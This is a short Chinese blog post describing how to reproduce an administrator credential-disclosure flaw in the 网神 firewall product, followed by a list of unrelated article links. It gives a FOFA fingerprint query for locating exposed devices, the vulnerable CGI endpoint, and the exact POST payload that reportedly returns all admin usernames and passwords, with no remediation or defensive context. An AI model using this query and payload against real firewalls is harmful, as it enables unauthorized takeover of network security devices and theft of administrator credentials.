当前位置: 首页 > news >正文

网神防火墙后台用户敏感信息泄露漏洞复现

news 来源:原创 2024/9/20 7:50:22

简介

网神防火墙是一款由中国知名网络安全公司启明星辰开发的防火墙产品。它提供了全面的网络安全防护功能,旨在保护企业网络免受各种网络威胁和攻击。

该产品存在用户账号信息泄露漏洞,通过构造特定数据包,获取防火墙管理员登录的账号密码。

漏洞复现

FOFA语法:

body="sec_gate_image/login_02.gif"

访问界面如下所示:

POC:

/cgi-bin/authUser/authManageSet.cgi

进行GET请求访问页面返回为空证明该文件存在可尝试进行测试

POST请求:

type=getAllUsers&_search=false&nd=1645000391264&rows=-1&page=1&sidx=&sord=asc

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • .NET 药厂业务系统 CPU爆高分析
  • ai学习笔记-入门
  • 基于ssm校园交友网站设计与实现(源码齐全可用)
  • 云原生之深入解析如何使用Vcluster Kubernetes加速开发效率
  • WAF绕过常见方法
  • SpringMVC01
  • 天猫数据分析(天猫查数据工具):2023年天猫平台假发行业市场销售数据分析报告
  • XZ_iOS 之 M1 M2 M3的M系列芯片的Mac苹果电脑安装cocoapods
  • Redis cluster集群设置密码
  • Wireshark与其他工具的整合
  • ImageIO类的使用
  • urllib2 HTTP头部注入
  • 【递归 回溯】LeetCode-226. 翻转二叉树
  • 还在用nvm?来试试更快的node版本管理工具——fnm
  • 【C语言】自定义类型——枚举、联合体
  • hexo+github搭建个人博客
  • 《深入 React 技术栈》
  • 【mysql】环境安装、服务启动、密码设置
  • 30天自制操作系统-2
  • 8年软件测试工程师感悟——写给还在迷茫中的朋友
  • Bytom交易说明(账户管理模式)
  • java取消线程实例
  • LeetCode29.两数相除 JavaScript
  • sublime配置文件
  • Vue.js 移动端适配之 vw 解决方案
  • WePY 在小程序性能调优上做出的探究
  • Windows Containers 大冒险: 容器网络
  • 高度不固定时垂直居中
  • 前端_面试
  • 如何用Ubuntu和Xen来设置Kubernetes?
  • 微信小程序:实现悬浮返回和分享按钮
  • 深度学习之轻量级神经网络在TWS蓝牙音频处理器上的部署
  • puppet连载22:define用法
  • 翻译 | The Principles of OOD 面向对象设计原则
  • 如何在 Intellij IDEA 更高效地将应用部署到容器服务 Kubernetes ...
  • ​香农与信息论三大定律
  • $forceUpdate()函数
  • (1)svelte 教程:hello world
  • (libusb) usb口自动刷新
  • (二十九)STL map容器(映射)与STL pair容器(值对)
  • (附源码)springboot宠物医疗服务网站 毕业设计688413
  • (附源码)ssm基于jsp高校选课系统 毕业设计 291627
  • (附源码)ssm教师工作量核算统计系统 毕业设计 162307
  • (黑马出品_高级篇_01)SpringCloud+RabbitMQ+Docker+Redis+搜索+分布式
  • (十八)SpringBoot之发送QQ邮件
  • (一)使用IDEA创建Maven项目和Maven使用入门(配图详解)
  • .net 8 发布了,试下微软最近强推的MAUI
  • .Net Core中Quartz的使用方法
  • .Net 高效开发之不可错过的实用工具
  • .NET/C# 使用反射调用含 ref 或 out 参数的方法
  • .net打印*三角形
  • .NET牛人应该知道些什么(2):中级.NET开发人员
  • .NET企业级应用架构设计系列之结尾篇
  • .Net语言中的StringBuilder:入门到精通
  • .Net中wcf服务生成及调用